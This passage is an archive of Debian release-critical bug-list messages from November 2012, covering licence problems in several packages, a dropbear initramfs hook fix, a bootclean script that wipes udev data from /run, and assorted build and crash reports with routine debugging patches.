 On Thu, Nov 08, 2012 at 11:03:20AM +0100, Jérémy Bobbio wrote:
  Do you confirm that leaving out the second parameter creates a correct
  initramfs when libc6-i686 is installed?
 
 Using pbuilder and a plain sid i386 chroot I verified the following:
 1) With libc6-i686 installed the nss_compat files do not end up in the
initramfs.
 2) When locally modifying the hook to leave out the second parameter,
they do end up in the initramfs.
 
 I did not attempt to boot the resulting initramfs. Given that my
 workaround gave me a bootable system, my best guess would be that this
 is enough.

Just to make it clear, your workaround and removing the second
parameter both result in having libnss_compat in `/lib/i686/cmov`?

-- 
Jérémy Bobbio.''`. 
jeremy.bob...@irq7.fr   : :   : lu...@debian.org
`. `'` 
  `-


signature.asc
Description: Digital signature


Bug#692622: [Debichem-devel] Bug#692622: non-free files in upstream tarball (The Software shall be used for Good, not Evil)

2012-11-08 Thread Michael Banck
Hi,

On Wed, Nov 07, 2012 at 10:56:57PM +0100, Ansgar Burchardt wrote:
 Package: jmol
 Version: 12.2.32+dfsg-1
 Severity: serious
 
 The upstream tarball contains files under the non-free JSON license:

Thanks for letting us know, we will take a look.


Best regards,

Michael


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#630581: fix for #682964 is incomplete, maybe related to #630581

2012-11-08 Thread Helmut Grohne
On Thu, Nov 08, 2012 at 12:23:37PM +0100, Jérémy Bobbio wrote:
 Just to make it clear, your workaround and removing the second
 parameter both result in having libnss_compat in `/lib/i686/cmov`?

Thanks for your attention to detail.

My workaround used the non-i686 versions of those files. The paths are
therefore /lib/i386-linux-gnu/libnss_compat*.

The fix will use the i686 versions. The paths are therefore
/lib/i386-linux-gnu/i686/cmov/libnss_compat*.

The paths apply to both source (on the system) and destination (in the
initramfs). So the suggested removal of the second parameter results in
a different initramfs than the one I tested. I do not expect this to be
a problem, but I can be wrong here. Bugs can be subtle.

Helmut


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#692732: src:ntop: non-free files in main (CC-BY-NC)

2012-11-08 Thread Ansgar Burchardt
Package: src:ntop
Version: 3:4.99.3+ndpi5517+dfsg1-1
Severity: serious

Files: countmin.h
Copyright: 2003-2004, G. Cormode
License: CC-BY-NC

That is obviously a non-free, GPL-incompatible license.

Ansgar


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#677097: mountall-bootclean.sh nukes udev's data in /run

2012-11-08 Thread Jakub Wilk

* Roger Leigh rle...@codelibre.net, 2012-11-08, 00:22:
mountall-bootclean.sh removes files from /run, but these may include 
files created by init scripts earlier in the same boot process. I 
observed this because the script nuked files in /run/udev/, leaving 
my X server without any input devices.

I can still reproduce this bug.

That's a bit frustrating, I thought we had this nailed now.

Would it be possible to debug this in a bit more detail on your system? 
/lib/init/bootclean.sh's clean function must be failing all these 
checks:


   # Does not exist
   [ -d $dir ] || return 1
   # tmpfs does not require cleaning
   [ -f $dir/.tmpfs ]  return 0
   # Can clean?
   checkflagfile $dir || return 0
   # Already cleaned
   [ -f ${dir}/.clean ]  return 0
   # Can't clean yet?
   which find /dev/null 21 || return 1

Could you possibly put some print statements in there and find out if 
all these pass?  If so, is the .tmpfs file missing? Or the .clean 
flag file?  If that's the case, we really need to know why they aren't 
present, since they should have been created before this point.


If the init scripts are being run in the wrong order, these could 
potentially be run after the files were deleted.


This is what happens with the attached patch:

Thu Nov  8 12:17:30 2012: Cleaning up temporary files
Thu Nov  8 12:17:30 2012: BEFORE BOOTMISC: [ .tmpfs dhclient.eth0.pid initctl 
initramfs lock mount network sendsigs.omit.d shm udev utmp ]
Thu Nov  8 12:17:30 2012: AFTER BOOTMISC: [ dhclient.eth0.pid initctl initramfs 
lock mount network sendsigs.omit.d shm udev utmp ]
Thu Nov  8 12:17:31 2012: Setting up X socket directories... /tmp/.X11-unix 
/tmp/.ICE-unix.
Thu Nov  8 12:17:31 2012: BEFORE MOUNTALL-BOOTCLEAN: [ dhclient.eth0.pid 
initctl initramfs lock mount network sendsigs.omit.d shm udev utmp ]
Thu Nov  8 12:17:31 2012: Cleaning up temporary files... /tmp /lib/init/rw /run 
/run/lock /run/shm.
Thu Nov  8 12:17:31 2012: AFTER MOUNTALL-BOOTCLEAN: [ .clean initramfs lock 
mount network sendsigs.omit.d shm udev utmp ]
Thu Nov  8 12:17:31 2012: INIT: Entering runlevel: 2

(This is on a VM on which I had to impose a sleep to make the bug 
trigger. However, the bug also triggers naturally on my development 
machine, which I can't reboot right know, though I'm pretty sure the 
cause is the same there.)


As I understand it, bootmisc is supposed to be run _after_ 
mountall-bootclean, though this order doesn't seem to be enforced in any 
way.


--
Jakub Wilk
--- unpacked/etc/init.d/mountall-bootclean.sh	2012-05-25 00:39:27.0 +0200
+++ /etc/init.d/mountall-bootclean.sh	2012-11-08 12:00:27.567362205 +0100
@@ -14,8 +14,11 @@
 
 case $1 in
   start|)
+	sleep 2
 	# Clean /tmp, /var/lock, /var/run
+	echo BEFORE MOUNTALL-BOOTCLEAN: \[ $(ls -A /run) \]
 	clean_all
+	echo AFTER MOUNTALL-BOOTCLEAN: \[ $(ls -A /run) \]
 	exit $?
 	;;
   restart|reload|force-reload)
--- unpacked/etc/init.d/bootmisc.sh	2012-05-25 00:39:27.0 +0200
+++ /etc/init.d/bootmisc.sh	2012-11-08 12:00:28.087361602 +0100
@@ -41,7 +41,9 @@
 
 case $1 in
   start|)
+	echo BEFORE BOOTMISC: \[ $(ls -A /run) \]
 	do_start
+	echo AFTER BOOTMISC: \[ $(ls -A /run) \]
 	;;
   restart|reload|force-reload)
 	echo Error: argument '$1' not supported 2


Bug#692733: src:epydoc: non-free files in main (CC-BY-NC-SA)

2012-11-08 Thread Ansgar Burchardt
Package: src:epydoc
Version: 3.0.1-12
Severity: serious

Files: doc/pycon-epydoc.html
Copyright: 2004 Edward Loper
License: CC-BY-NC-SA

That's a non-free license and not appropriate for Debian.

Ansgar


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#692735: non-free file in main (CC-BY-NC)

2012-11-08 Thread Ansgar Burchardt
Package: src:openclipart2
Version: 2.0-2
Severity: serious

clipart/pbhj/pbhj_creating_an_oval_vignette.svg seems to be released under
CC-BY-NC: the file contains '(C) 2008, CC-BY-NC, p...@alicious.com'.

This is a non-free license.

Ansgar


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#692624: fossil license issue

2012-11-08 Thread Richard Hipp
On Thu, Nov 8, 2012 at 6:02 AM, Barak A. Pearlmutter ba...@cs.nuim.iewrote:

 As reported in
  http://bugs.debian.org/692624
 there is a license issue in fossil, namely

   $ egrep -B12 -A8 -i 'not Evil' src/cson_amalgamation.c
   It is this well-meaning clause

   The Software shall be used for Good, not Evil.

 which renders the license non-free,
 (Seriously, now that it's been reported this will percolate through the
 system and cause fossil to be pulled from Debian if it isn't fixed.)



The cson_amalgamation.c file is only used by Fossil is you build with
configure --json.  So, omit the --json on Debian (which you are probably
already doing anyhow.)




-- 
D. Richard Hipp
d...@sqlite.org


Bug#692737: suckless-tools: newer slock versions prevents unwanted exposure of passwords

2012-11-08 Thread Nico Golde
Package: suckless-tools
Version: 38-2
Severity: grave
Justification: user security hole


Hey,
this package has not updated any of the tools included since two years.
Please package newer tools, especially but most important slock.

The current version of slock has no indication whatsoever that a screen lock is 
active.
After a longer idle period of the display, it is therefore impossible to 
distinguish between a locked
screen and an inactive screen. As a result, it is not too difficult to write 
your password somewhere
you don't want to because you assumed the screen was locked.
Hence I marked this as grave, this happened to me multiple times.

Newer slock versions have a color indication once you hit the first key on the 
keyboard that shows
you that the lock is active.

Kind regards
Nico


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#692739: gdm3/experimental: FTBFS on kfreebsd-any, needs porting and testing

2012-11-08 Thread Simon McVittie
Package: gdm3
Version: 3.6.0-1
Severity: serious
Justification: fails to build from source (but built successfully in the past)
Tags: experimental upstream
Forwarded: https://bugzilla.gnome.org/show_bug.cgi?id=687921

From the buildd log:
 gdm-session.c: In function 'credentials_get_unix_pid':
 gdm-session.c:989:2: error: #error platform not supported, need mechanism to 
 detect pid of connected process

The #elif defined (__FreeBSD__) case should be
#elif defined (__FreeBSD__) || defined (__FreeBSD_kernel__) for Debian
(GNOME #687921).

Also, that code path is clearly broken, because it uses
G_CREDENTIALS_TYPE_OPENBSD_SOCKPEERCRED, whereas I expect it should be using
G_CREDENTIALS_TYPE_FREEBSD_CMSGCRED on FreeBSD. (Also GNOME #687921.)

This leads me to believe that it has never been tested, so I'm not going
to do anything about this bug until/unless someone tests it on kFreeBSD and
confirms that the resulting gdm3 actually works. (This is the version
in experimental, so there's no particular urgency.) If it does work,
please tell upstream.

Alternatively, someone could implement g_credentials_get_unix_pid(),
which clearly ought to exist anyway, and would move the problem into GIO.
(GNOME #687920.)

This is also a problem on Hurd, but as far as I understand it, Hurd doesn't
support credentials-passing at all; gdm3 appears to require
credentials-passing, so it's right that it continue to FTBFS on Hurd. From
https://www.gnu.org/software/hurd/open_issues/sendmsg_scm_creds.html
it appears that if Hurd ever gets credentials-passing, it'll be
FreeBSD-style SCM_CREDS.

S


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#692624: fossil license issue

2012-11-08 Thread Richard Hipp
On Thu, Nov 8, 2012 at 7:54 AM, Barak A. Pearlmutter ba...@cs.nuim.iewrote:

  The cson_amalgamation.c file is only used by Fossil is you build
  with configure --json.  So, omit the --json on Debian (which you
  are probably already doing anyhow.)

 Right, the only config option used now is --disable-internal-sqlite.
 But unfortunately this is not quite enough to satisfy the persnickety
 filters.  I'll have to make a repackaged source tarball that does not
 include the problematic file, so it won't be in a source distribution.
 But the build system barfs if the file is missing, so I'll have to
 deal with that.  Also it is a derived file, and the original source
 isn't in the repo.


You can substitute empty files for cson_amalgamation.c and
cson_amalgamation.h.



 Gah.

 --Barak.




-- 
D. Richard Hipp
d...@sqlite.org


Bug#692624: fossil license issue

2012-11-08 Thread Barak A. Pearlmutter
 The cson_amalgamation.c file is only used by Fossil is you build
 with configure --json.  So, omit the --json on Debian (which you
 are probably already doing anyhow.)

Right, the only config option used now is --disable-internal-sqlite.
But unfortunately this is not quite enough to satisfy the persnickety
filters.  I'll have to make a repackaged source tarball that does not
include the problematic file, so it won't be in a source distribution.
But the build system barfs if the file is missing, so I'll have to
deal with that.  Also it is a derived file, and the original source
isn't in the repo.

Gah.

--Barak.


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#630581: NMU diff between -1 and -1.3

2012-11-08 Thread Jérémy Bobbio
Attached is the diff between versions 2012.55-1 and 2012.55-1.3.

-- 
Jérémy Bobbio.''`. 
jeremy.bob...@irq7.fr   : :   : lu...@debian.org
`. `'` 
  `-
diff -u dropbear-2012.55/debian/changelog dropbear-2012.55/debian/changelog
--- dropbear-2012.55/debian/changelog
+++ dropbear-2012.55/debian/changelog
@@ -1,3 +1,27 @@
+dropbear (2012.55-1.3) unstable; urgency=medium
+
+  * Non-maintainer upload.
+  * Fix initramfs hook when multiple variant of libc are installed.
+All credits due to Helmut Grohne for the report and the solution.
+(Closes: #682964)
+
+ -- Jérémy Bobbio lu...@debian.org  Thu, 08 Nov 2012 10:45:01 +0100
+
+dropbear (2012.55-1.2) unstable; urgency=low
+
+  * Non-maintainer upload.
+  * Unbreak initramfs hook when upgrading from Squeeze.
+
+ -- Jérémy Bobbio lu...@debian.org  Tue, 25 Sep 2012 16:53:18 +0200
+
+dropbear (2012.55-1.1) unstable; urgency=low
+
+  * Non-maintainer upload.
+  * Adjust initramfs hook to work with multi-arch. Initial patch by
+Michael Stapelberg. (Closes: #630581)
+
+ -- Jérémy Bobbio lu...@debian.org  Tue, 25 Sep 2012 09:17:06 +0200
+
 dropbear (2012.55-1) unstable; urgency=high
 
   * New upstream release.
diff -u dropbear-2012.55/debian/initramfs/dropbear-hook dropbear-2012.55/debian/initramfs/dropbear-hook
--- dropbear-2012.55/debian/initramfs/dropbear-hook
+++ dropbear-2012.55/debian/initramfs/dropbear-hook
@@ -27,7 +27,11 @@
 	else
 		rm -f ${DESTDIR}/sbin/dropbear
 		copy_exec /usr/sbin/dropbear /sbin/
-		cp /lib/libnss_* ${DESTDIR}/lib/
+		LIBC_DIR=$(ldd /usr/sbin/dropbear | sed -n -e 's,.* = \(/lib.*\)/libc\.so\..*,\1,p')
+		for so in $(find ${LIBC_DIR} -name 'libnss_compat*'); do
+			copy_exec ${so}
+		done
+		echo 'passwd: compat'  ${DESTDIR}/etc/nsswitch.conf
 		echo root:x:0:0:root:/root:/bin/sh  ${DESTDIR}/etc/passwd
 		for keytype in dss rsa; do
 			if [ ! -f /etc/initramfs-tools/etc/dropbear/dropbear_${keytype}_host_key ]; then


signature.asc
Description: Digital signature


Bug#692752: wget return empty file

2012-11-08 Thread Mathieu Malaterre
Package: wget
Version: 1.12-2.1
Severity: grave

I cannot retrieve a simple page, wget keeps on failing:

$ wget http://www.lfd.uci.edu/~gohlke/code/tifffile.py.html
--2012-11-08 14:56:14--  http://www.lfd.uci.edu/~gohlke/code/tifffile.py.html
Resolving www.lfd.uci.edu... 128.195.135.4
Connecting to www.lfd.uci.edu|128.195.135.4|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/plain]
Saving to: “tifffile.py.html”

[   = 
 ] 1   --.-K/s   in 1.9s

2012-11-08 14:56:17 (0.53 B/s) - “tifffile.py.html” saved [1]

$ GET -e  http://www.lfd.uci.edu/~gohlke/code/tifffile.py.html 
Connection: close 
Date: Thu, 08 Nov 2012 13:57:26 GMT 
Server: Microsoft-IIS/6.0 
Content-Type: text/html 
Author: Christoph Gohlke 
Client-Date: Thu, 08 Nov 2012 13:57:36 GMT 
Client-Peer: 128.195.135.4:80 
Client-Response-Num: 1 
Link: /~gohlke/icon.ico; rel=icon; type=image/x-icon 
Link: /~gohlke/icon.ico; rel=shortcut icon; type=image/x-icon 
Title: tifffile.py - Christoph Gohlke 
X-Meta-Handheldfriendly: true 
X-Meta-Robots: noarchive 
X-Meta-Viewport: width=device-width; height=device-height; user-scalable=no 
X-Powered-By: Python 
 
!DOCTYPE html PUBLIC -//W3C//DTD HTML 4.01//EN 
   http://www.w3.org/TR/html4/strict.dtd; 
 
html
...

-- System Information:
Debian Release: 6.0.6
  APT prefers stable-updates
  APT policy: (500, 'stable-updates'), (500, 'stable'), (200, 'testing'), (100, 
'unstable')
Architecture: amd64 (x86_64)

Kernel: Linux 3.2.0-0.bpo.3-amd64 (SMP w/8 CPU cores)
Locale: LANG=en_US.utf8, LC_CTYPE=en_US.utf8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash

Versions of packages wget depends on:
ii  dpkg   1.15.8.13 Debian package management system
ii  install-info   4.13a.dfsg.1-6Manage installed documentation in 
ii  libc6  2.11.3-4  Embedded GNU C Library: Shared lib
ii  libssl0.9.80.9.8o-4squeeze13 SSL shared libraries

wget recommends no packages.

wget suggests no packages.

-- no debconf information


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#692753: Balazar dies soon with Error: class 'soya.GLError'(GL_INVALID_OPERATION)

2012-11-08 Thread Thibaut Paumard
Package: balazar
Version: 0.3.4.ds1-6.1
Severity: grave

Hi,

I just installed balazar to try it out. After a few seconds in the game (around
30s?) the game crashes. The graphic window shows an error message:
Error: class 'soya.GLError'(GL_INVALID_OPERATION).

The console from whihc I started the game shows:
thibaut@b-wing:~/Documents/CND/2011/data/10mayosir$ balazar
* Balazar * Balazar lives in /usr/share/games
* Soya * Using Software Surface.
* Soya * Using 8 bits stencil buffer
* Soya * OpenGL initialization  [OK]

* Soya * version 0.15rc1
* Using OpenGL 3.3.0 NVIDIA 304.48
*   - renderer : GeForce 320M/integrated/SSE2
*   - vendor   : NVIDIA Corporation
*   - maximum number of lights: 8
*   - maximum number of clip planes   : 8
*   - maximum number of texture units : 4
*   - maximum texture size: 8192 pixels
* Using OpenAL 1.1 ALSOFT 1.14
*   - renderer  : OpenAL Soft
*   - vendor: OpenAL Community

* Soya * Using Software Surface.
* Soya * Using 16 bits stencil buffer
* Soya * OpenGL initialization  [OK]
* Tofu * Creating new player thibaut...
* Balazar * Creating level 0, 0...
* Tofu * Level level_0_0 38667584 activated !
* Tofu * Player thibaut login !
GL_INVALID_OPERATION
Traceback (most recent call last):
  File /usr/share/games/balazar/gui.py, line 216, in play_solo
r = balazar.game_interface.start_single(globdef.NAME, test)
  File /usr/share/games/balazar/game_interface.py, line 110, in start_single
r = tofu.single.serve_forever(login = login, password = password)
  File /usr/lib/pymodules/python2.7/tofu/single.py, line 75, in serve_forever
return tofu.IDLER.idle()
  File main_loop.pyx, line 125, in _soya.MainLoop.idle
  File main_loop.pyx, line 185, in _soya.MainLoop.main_loop
  File main_loop.pyx, line 281, in _soya.MainLoop.render
  File renderer.pyx, line 434, in _soya.render
  File renderer.pyx, line 410, in _soya.check_gl_error
_soya.GLError: GL_INVALID_OPERATION

Regards, Thibaut.



-- System Information:
Debian Release: wheezy/sid
  APT prefers testing-updates
  APT policy: (500, 'testing-updates'), (500, 'testing')
Architecture: amd64 (x86_64)

Kernel: Linux 3.2.0-3-amd64 (SMP w/2 CPU cores)
Locale: LANG=fr_FR.UTF-8, LC_CTYPE=fr_FR.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash

Versions of packages balazar depends on:
ii  python 2.7.3~rc2-1
ii  python-cerealizer  0.7-4
ii  python-pyvorbis1.5-1
ii  python-soya0.15~rc1-8
ii  python-support 1.0.15
ii  python-tofu0.5-5

balazar recommends no packages.

Versions of packages balazar suggests:
pn  python-psyco  none

-- no debconf information


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Processed: severity of 692727 is serious

2012-11-08 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 severity 692727 serious
Bug #692727 [libmapi0] libmapi0: MAPI_E_CALL_FAILED (0x80004005) in Evolution 
when sending mails or creating appointments
Severity set to 'serious' from 'normal'
 thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
692727: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=692727
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Processed: tagging 692727

2012-11-08 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 tags 692727 + upstream
Bug #692727 [libmapi0] libmapi0: MAPI_E_CALL_FAILED (0x80004005) in Evolution 
when sending mails or creating appointments
Ignoring request to alter tags of bug #692727 to the same tags previously set
 thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
692727: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=692727
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Processed: tagging 692727

2012-11-08 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 tags 692727 + confirmed
Bug #692727 [libmapi0] libmapi0: MAPI_E_CALL_FAILED (0x80004005) in Evolution 
when sending mails or creating appointments
Added tag(s) confirmed.
 thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
692727: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=692727
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#684962: marked as done (l2tp-ipsec-vpn: removes files that were installed by another package: /etc/ipsec.{conf, secrets}, /etc/xl2tpd/xl2tpd.conf)

2012-11-08 Thread Debian Bug Tracking System
Your message dated Thu, 08 Nov 2012 14:47:56 +
with message-id e1twtoe-00025k...@franck.debian.org
and subject line Bug#684962: fixed in l2tp-ipsec-vpn 1.0.9-1
has caused the Debian Bug report #684962,
regarding l2tp-ipsec-vpn: removes files that were installed by another package: 
/etc/ipsec.{conf, secrets}, /etc/xl2tpd/xl2tpd.conf
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
684962: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=684962
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
---BeginMessage---
Package: l2tp-ipsec-vpn
Version: 1.0.7-1
Severity: serious
User: debian...@lists.debian.org
Usertags: piuparts

Hi,

during a test with piuparts I noticed your package removes files that
were installed by another package.
The removed files were already present before the package was installed,
they may have been shipped or created by a dependency.

This could be a violation of policy 10.7.4 (Sharing configuration
files), see
http://www.debian.org/doc/debian-policy/ch-files.html#s10.7.4
or policy chapter 6 (Package maintainer scripts...), see
http://www.debian.org/doc/debian-policy/ch-maintainerscripts.html
or policy 7.6 (Overwriting files...), see
http://www.debian.org/doc/debian-policy/ch-relationships.html#s-replaces

If a directory is used by several packages, all should ship it as part
of the package (possibly empty, using $package.dirs to create it), and
no package should mkdir/rmdir it in the maintainer scripts as dpkg will
take care of this.

From the attached log (scroll to the bottom...):

1m2.9s ERROR: FAIL: After purging files have disappeared:
  /etc/ipsec.confowned by: openswan
  /etc/ipsec.secrets owned by: openswan
  /etc/xl2tpd/xl2tpd.confowned by: xl2tpd


cheers,

Andreas


l2tp-ipsec-vpn_1.0.7-1.log.gz
Description: GNU Zip compressed data
---End Message---
---BeginMessage---
Source: l2tp-ipsec-vpn
Source-Version: 1.0.9-1

We believe that the bug you reported is fixed in the latest version of
l2tp-ipsec-vpn, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 684...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Werner Jaeger werner_jae...@web.de (supplier of updated l2tp-ipsec-vpn 
package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@debian.org)


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Format: 1.8
Date: Fri, 12 Oct 2012 06:00:13 +0200
Source: l2tp-ipsec-vpn
Binary: l2tp-ipsec-vpn
Architecture: source amd64
Version: 1.0.9-1
Distribution: unstable
Urgency: low
Maintainer: Werner Jaeger werner_jae...@web.de
Changed-By: Werner Jaeger werner_jae...@web.de
Description: 
 l2tp-ipsec-vpn - control your L2TP IPsec VPN connections
Closes: 684962
Changes: 
 l2tp-ipsec-vpn (1.0.9-1) unstable; urgency=low
 .
   * New upstream release
 - fixed bug removes files that were installed by another package
   (Closes: #684962)
 .
 l2tp-ipsec-vpn (1.0.8-1) unstable; urgency=low
 .
   * New upstream release
 - fixed bug wrong email address choosen as username in EAP TLS
   authentication
 - now caching EAP-TLS autentication certificate in /etc/ipsec.d/certs
   directory
Checksums-Sha1: 
 f73ec435b0ec980be56c6a9f5a68027655204cc2 1417 l2tp-ipsec-vpn_1.0.9-1.dsc
 0dd30417eec9203a6e08bdc9051b0391f021d731 197119 
l2tp-ipsec-vpn_1.0.9.orig.tar.gz
 184ba8fab49c148d48e52490a5d15afa35773197 4578 
l2tp-ipsec-vpn_1.0.9-1.debian.tar.gz
 8e42e16114b2bb67271b9cb82160d5934d99adb4 255978 
l2tp-ipsec-vpn_1.0.9-1_amd64.deb
Checksums-Sha256: 
 f46326d32a0bf8c56c0de59cfb64cd8c1794932323a6c26f143bc21415576e48 1417 
l2tp-ipsec-vpn_1.0.9-1.dsc
 b74ea67c4e397e25824319345a31128b502e3417e588ba1f63e3a8bd7ff4e661 197119 
l2tp-ipsec-vpn_1.0.9.orig.tar.gz
 48435251f9bf0f5693523d634da681de340f6a97166547f2533596242086269f 4578 
l2tp-ipsec-vpn_1.0.9-1.debian.tar.gz
 549eb7df14a27379f7f78c4e8624ee398932bbceddd1646dc309f8e155794609 255978 
l2tp-ipsec-vpn_1.0.9-1_amd64.deb
Files: 
 4034f7041f57060e853eb4c949a2f080 1417 net optional l2tp-ipsec-vpn_1.0.9-1.dsc
 4679e6fae4e82f285ee39479660ba48f 197119 net optional 
l2tp-ipsec-vpn_1.0.9.orig.tar.gz
 1ba3b3c4ba1e3b1fa4370a31a6e068af 4578 net optional 
l2tp-ipsec-vpn_1.0.9-1.debian.tar.gz
 ff4d5017f0843460ea304eea0c1040d9 255978 net optional 

Bug#689769: marked as done (Ample ships a /var/run/ample folder: Policy 9.3.2)

2012-11-08 Thread Debian Bug Tracking System
Your message dated Thu, 08 Nov 2012 14:47:28 +
with message-id e1twtoc-0001qh...@franck.debian.org
and subject line Bug#689769: fixed in ample 0.5.7-6.1
has caused the Debian Bug report #689769,
regarding Ample ships a /var/run/ample folder: Policy 9.3.2
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
689769: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=689769
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
---BeginMessage---
Package: ample
Version: 0.5.7-6
Severity: serious

/var/run may be a temporary filesystem, so any directories or files needed
/there must be created dynamically at boot time.

Refer to Debian Policy Manual section 9.3.2 (Writing the scripts) for
details.

Cheers,

Thomas Goirand (zigo)
---End Message---
---BeginMessage---
Source: ample
Source-Version: 0.5.7-6.1

We believe that the bug you reported is fixed in the latest version of
ample, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 689...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Ulrich Dangel u...@debian.org (supplier of updated ample package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@debian.org)


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Format: 1.8
Date: Sat, 03 Nov 2012 13:53:23 +
Source: ample
Binary: ample
Architecture: source amd64
Version: 0.5.7-6.1
Distribution: unstable
Urgency: low
Maintainer: Rene Mayorga rmayo...@debian.org.sv
Changed-By: Ulrich Dangel u...@debian.org
Description: 
 ample  - A simple MP3 server easy to use
Closes: 689769
Changes: 
 ample (0.5.7-6.1) unstable; urgency=low
 .
   * Non-maintainer upload.
   * Create /var/run/ample at startup, Thanks to Thomas Goirand for the patch.
 (Closes: #689769)
   * Depend on $remote_fs in init script.
Checksums-Sha1: 
 8a3c847ab56042ab380f9cd3b473fbb70aac57c7 1695 ample_0.5.7-6.1.dsc
 4c1516145b5e28d65fa06c6b8e6d6c50b33a8899 7346 ample_0.5.7-6.1.diff.gz
 1768dfd75b01b7618f386ede0f234da5bf577a23 42724 ample_0.5.7-6.1_amd64.deb
Checksums-Sha256: 
 9b0fd3901037bb99017420c00dd710f28c94644b63b59965f4d443fd78b2e81f 1695 
ample_0.5.7-6.1.dsc
 12ff8109b4a70a33280e6380cb1e314ab3206c44f41bedd31bdec53ed09bddc3 7346 
ample_0.5.7-6.1.diff.gz
 14cab2404154fea835d3f4e67d63d15089492979488eca48503cdf1e53b2283d 42724 
ample_0.5.7-6.1_amd64.deb
Files: 
 6fca447fcf130c7eee58c19c18d434f9 1695 sound optional ample_0.5.7-6.1.dsc
 9386574ca6eeec868ce734aa8d3c6232 7346 sound optional ample_0.5.7-6.1.diff.gz
 ed020052f16384a52277c8d57ed415c2 42724 sound optional ample_0.5.7-6.1_amd64.deb

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.12 (GNU/Linux)

iQIcBAEBAgAGBQJQlSOjAAoJEASq5bOX8aqsJl4P/jDgQK6drL2FjAR61hXzPKK5
Te8Jft9JQCxikyahAdkG0I5/+pMXgkb6MbfXOWbnAY8s/Ybviy9EP04df4u4OQQG
cwnOrNgnjj3wcu7IkHe+N12/RhQHDtY9W2JFJkSLpHVsKzUadQgsItC8w/BGzDoG
38jhQJlmPx+y60JedWTYPpS2IgTOf+4Q1QPSE1aTAPbtBgf5tSZ7t0KD1MpT31kw
jqVntY+PuN+iO8DM/cwvd3OkS+uxRL1VYAR0J9H/V2D8vdXESFKa8vSAP2QrmeTk
wD9YGIGZe0Xj+X0M65Jk/y0K8T6MxjF93HRrxOdD1/nwUvTSAgnSKGCgxvJz+QT0
AaZaIo9w0TkDCNwM9atbTlM9BY/h22THS7SwrlKahrwLs0SZzvtp28zYwgExe8uH
8AFcMRSVX0H9YscnANEDiKGVPKZ6keGMn1O6MeN8fPmpdtEO9sj3WSusGxCieHgq
